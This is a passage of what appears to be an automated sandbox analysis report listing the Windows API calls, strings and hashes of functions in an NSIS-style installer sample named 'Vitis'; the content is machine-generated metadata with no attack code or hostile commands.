                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                            • String ID: N
                            • API String ID: 3103080414-1130791706
                            • Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                            • Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
                            • Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                            • Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                            • BeginPaint.USER32(?,?), ref: 00401047
                            • GetClientRect.USER32(?,?), ref: 0040105B
                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                            • DeleteObject.GDI32(?), ref: 004010ED
                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                            • SelectObject.GDI32(00000000,?), ref: 00401140
                            • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                            • DeleteObject.GDI32(?), ref: 00401165
                            • EndPaint.USER32(?,?), ref: 0040116E
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                            • String ID: F
                            • API String ID: 941294808-1304234792
                            • Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                            • Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
                            • Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                            • Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
                            • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191
                              • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                              • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                            • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
                            • wsprintfA.USER32 ref: 004061CC
                            • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                            • GlobalFree.KERNEL32(00000000), ref: 004062B5
                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                              • Part of subcall function 00405FF7: GetFileAttributesW.KERNEL32(00000003,004030BD,00438800,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                              • Part of subcall function 00405FF7: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                            • String ID: %ls=%ls$[Rename]
                            • API String ID: 2171350718-461813615
                            • Opcode ID: 68a7ef38075908c9c4bec8123d3c19496071c74805cf3302c9368033bafd0254
                            • Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
                            • Opcode Fuzzy Hash: 68a7ef38075908c9c4bec8123d3c19496071c74805cf3302c9368033bafd0254
                            • Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetDlgItem.USER32(?,000003FB), ref: 004049A3
                            • SetWindowTextW.USER32(00000000,?), ref: 004049CD
                            • SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
                            • CoTaskMemFree.OLE32(00000000), ref: 00404A89
                            • lstrcmpiW.KERNEL32(004281C0,00423708,00000000,?,?), ref: 00404ABB
                            • lstrcatW.KERNEL32(?,004281C0), ref: 00404AC7
                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9
                              • Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E
                              • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,00437800,?,004034D2,00437800,00437800,004037DA), ref: 004067F1
                              • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,00437800,00437800,004037DA), ref: 00406800
                              • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,74DF3420,00437800,?,004034D2,00437800,00437800,004037DA), ref: 00406805
                              • Part of subcall function 0040678E: CharPrevW.USER32(?,?,74DF3420,00437800,?,004034D2,00437800,00437800,004037DA), ref: 00406818
                            • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
                              • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                              • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
                              • Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                            • String ID: A
                            • API String ID: 2624150263-3554254475
                            • Opcode ID: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
                            • Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
                            • Opcode Fuzzy Hash: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
                            • Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetTickCount.KERNEL32 ref: 0040308E
                            • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
                              • Part of subcall function 00405FF7: GetFileAttributesW.KERNEL32(00000003,004030BD,00438800,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                              • Part of subcall function 00405FF7: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
                            • GlobalAlloc.KERNEL32(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
                            Strings
                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
                            • Null, xrefs: 00403174
                            • G8@, xrefs: 00403227, 00403242
                            • soft, xrefs: 0040316B
                            • Inst, xrefs: 00403162
                            • Error launching installer, xrefs: 004030CD
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                            • String ID: Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                            • API String ID: 2803837635-4108474850
                            • Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                            • Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
                            • Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                            • Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetSystemDirectoryW.KERNEL32(004281C0,00000400), ref: 0040665F
                            • GetWindowsDirectoryW.KERNEL32(004281C0,00000400,00000000,004226E8,?,004055A0,004226E8,00000000,00000000,?,00000000), ref: 00406672
                            • lstrcatW.KERNEL32(004281C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                            • lstrlenW.KERNEL32(004281C0,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040662D
                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004066E3
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: Directory$SystemWindowslstrcatlstrlen
                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                            • API String ID: 4260037668-730719616
                            • Opcode ID: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
                            • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                            • Opcode Fuzzy Hash: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
                            • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(004226E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                            • lstrlenW.KERNEL32(004033ED,004226E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                            • lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
                            • SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                              • Part of subcall function 00406544: lstrcatW.KERNEL32(004281C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                              • Part of subcall function 00406544: lstrlenW.KERNEL32(004281C0,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                            • String ID: &B
                            • API String ID: 1495540970-3208460036
                            • Opcode ID: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
                            • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                            • Opcode Fuzzy Hash: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
                            • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetWindowLongW.USER32(?,000000EB), ref: 004044E7
                            • GetSysColor.USER32(00000000), ref: 00404525
                            • SetTextColor.GDI32(?,00000000), ref: 00404531
                            • SetBkMode.GDI32(?,?), ref: 0040453D
                            • GetSysColor.USER32(?), ref: 00404550
                            • SetBkColor.GDI32(?,?), ref: 00404560
                            • DeleteObject.GDI32(?), ref: 0040457A
                            • CreateBrushIndirect.GDI32(?), ref: 00404584
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                            • String ID:
                            • API String ID: 2320649405-0
                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                            • Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                            • Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: CountTick$wsprintf
                            • String ID: ... %d%%$G8@
                            • API String ID: 551687249-649311722
                            • Opcode ID: a26557732bb01f6bddedaf8222426b1e26193f42140191bec4bb00bd26e51081
                            • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                            • Opcode Fuzzy Hash: a26557732bb01f6bddedaf8222426b1e26193f42140191bec4bb00bd26e51081
                            • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                              • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: File$Pointer$ByteCharMultiWide$Read
                            • String ID: 9
                            • API String ID: 163830602-2366072709
                            • Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                            • Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
                            • Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                            • Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
                            • GetMessagePos.USER32 ref: 00404E41
                            • ScreenToClient.USER32(?,?), ref: 00404E5B
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: Message$Send$ClientScreen
                            • String ID: f
                            • API String ID: 41195575-1993550816
                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                            • Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                            • Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                            • MulDiv.KERNEL32(?,00000064,?), ref: 00402FDC
                            • wsprintfW.USER32 ref: 00402FEC
                            • SetWindowTextW.USER32(?,?), ref: 00402FFC
                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                            Strings
                            • verifying installer: %d%%, xrefs: 00402FE6
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: Text$ItemTimerWindowwsprintf
                            • String ID: verifying installer: %d%%
                            • API String ID: 1451636040-82062127
                            • Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                            • Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
                            • Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                            • Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                            • wsprintfW.USER32 ref: 004068B6
                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: DirectoryLibraryLoadSystemwsprintf
                            • String ID: %s%S.dll$UXTHEME$\
                            • API String ID: 2200240437-1946221925
                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                            • Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                            • Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                            • GlobalFree.KERNEL32(?), ref: 00402A06
                            • GlobalFree.KERNEL32(00000000), ref: 00402A19
                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                            • String ID:
                            • API String ID: 2667972263-0
                            • Opcode ID: 7b0c029b9c5e7e6b8388003f1156d4aabb8cb2de0a1768ee69b2a829e4763d50
                            • Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
                            • Opcode Fuzzy Hash: 7b0c029b9c5e7e6b8388003f1156d4aabb8cb2de0a1768ee69b2a829e4763d50
                            • Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,00437800,?,004034D2,00437800,00437800,004037DA), ref: 004067F1
                            • CharNextW.USER32(?,?,?,00000000,?,004034D2,00437800,00437800,004037DA), ref: 00406800
                            • CharNextW.USER32(?,00000000,74DF3420,00437800,?,004034D2,00437800,00437800,004037DA), ref: 00406805
                            • CharPrevW.USER32(?,?,74DF3420,00437800,?,004034D2,00437800,00437800,004037DA), ref: 00406818
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: Char$Next$Prev
                            • String ID: *?|<>/":
                            • API String ID: 589700163-165019052
                            • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
